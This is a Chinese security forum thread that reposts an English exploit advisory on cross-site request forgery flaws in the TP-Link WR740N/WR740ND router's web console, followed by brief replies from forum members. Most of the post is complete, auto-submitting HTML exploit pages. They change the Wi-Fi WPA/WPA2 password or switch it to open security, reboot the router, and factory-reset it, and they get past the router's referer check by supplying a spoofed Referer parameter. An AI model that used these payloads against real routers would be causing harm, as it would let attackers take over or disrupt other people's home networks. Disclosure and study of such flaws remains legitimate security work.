查看: 11385|回复: 4

【转】TPLINK WR740N / WR740ND -多个CSRF漏洞

[复制链接]

该用户从未签到

发表于 2013-11-26 23:28:03 | 显示全部楼层 |阅读模式
看来不发点东西是
[AppleScript] 纯文本查看 复制代码
# Exploit Title: TPLINK WR740N Multiple CSRF Vulnerabilities
# Date: 11/24/2013
# Author: SaMaN( @samanL33T )
# Vendor Homepage: http://tplink.com
# Category: Hardware/Wireless Router
# Firmware Version: 3.16.6 Build 130529 Rel.47286n and below
# Tested on: WR740N/WR740ND (May be possible on other models)
---------------------------------------------------
  
Technical Details
~~~~~~~~~~~~~~~~~~
TPLINK WIreless Router WR740N has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router,Change Settings by simply making the user visit a CSRF link.
 
Application uses "HTTP-REFERER" check functionality to check for CSRF attacks. But it can easily be bypassed using the "Referer" parameter with value set to target's I.P in the GET request.
 
 
Exploit Code 
~~~~~~~~~~~~~
 
Change WPA/WPA2 password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/WlanSecurityRpm.htm"
method="GET" name="form">
<input type="hidden" name="secType" value="3">
<input type="hidden" name="pskSecOpt" value="3">
<input type="hidden" name="pskCipher" value="3">
<input type="hidden" name="pskSecret" value="[WPA/WPA2_PASSWORD]">
<input type="hidden" name="interval" value="0">
<input type="hidden" name="wpaSecOpt" value="3">
<input type="hidden" name="wpaCipher" value="1">
<input type="hidden" name="radiusIP" value="">
<input type="hidden" name="rediusPort" value="1812">
<input type="hidden" name="radiusSecret" value="">
<input type="hidden" name="IntervalWpa" value="0">
<input type="hidden" name="webSecOpt" value="1">
<input type="hidden" name="keytype" value="1">
<input type="hidden" name="keynum" value="1">
<input type="hidden" name="key1" value="">
<input type="hidden" name="length1" value="0">
<input type="hidden" name="key2" value="">
<input type="hidden" name="length2" value="0">
<input type="hidden" name="key3" value="">
<input type="hidden" name="length3" value="0">
<input type="hidden" name="key4" value="">
<input type="hidden" name="length4" value="0">
<input type="hidden" name="Save" value="Save">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">
</form>
</body>
</html>
 
 
#For Changing the Security to Open WEP, simply change "secType" value to 1.
 
Reboot Router by CSRF
~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/SysRebootRpm.htm"
method="GET" name="form">
<input type="hidden" name="Reboot" value="Reboot">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">
</form>
</body>
</html>
 
 
Factory Reset the Router
~~~~~~~~~~~~~~~~~~~~~~~~
 
<html>
<body onload="document.form.submit();">
<form action="http://[TARGET/IP]/userRpm/RestoreDefaultCfgRpm.htm"
method="GET" name="form">
<input type="hidden" name="Restorefactory" value="Restore">
<input type="hidden" name="Referer" value="http://[TARGET/IP]/">
</form>
</body>
</html>
不行了,小白来给大家分享一个TPLINK WR740N / WR740ND -CSRF漏洞的漏洞吧{:soso_e144:}
回复

使用道具 举报

  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2013-11-26 23:39:04 | 显示全部楼层
    貌似昨晚盼盼在群里提到了。。。就是没看到那撒比发帖
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-1-16 21:33
  • 签到天数: 175 天

    [LV.7]常住居民III

    发表于 2013-11-27 00:16:43 | 显示全部楼层
    我表示你的洞不全。。。  因为事先你要登陆才能对立面操作,登陆的格式我发在群里了。。
    还有就是CSRF是通过JS构造语句实现的,,你这个没看到对路由进行攻击啊。。

    点评

    谢谢啊  详情 回复 发表于 2013-11-27 21:05
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-11-27 00:35:34 | 显示全部楼层
    跳转到的页面没有i, 这个只是读取一个IP 而已,知道原理,谁都能写
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2013-11-27 21:05:28 | 显示全部楼层
    Antergone 发表于 2013-11-27 00:16
    我表示你的洞不全。。。  因为事先你要登陆才能对立面操作,登陆的格式我发在群里了。。
    还有就是CSRF是通 ...

    谢谢啊
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-23 23:46 , Processed in 0.027301 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部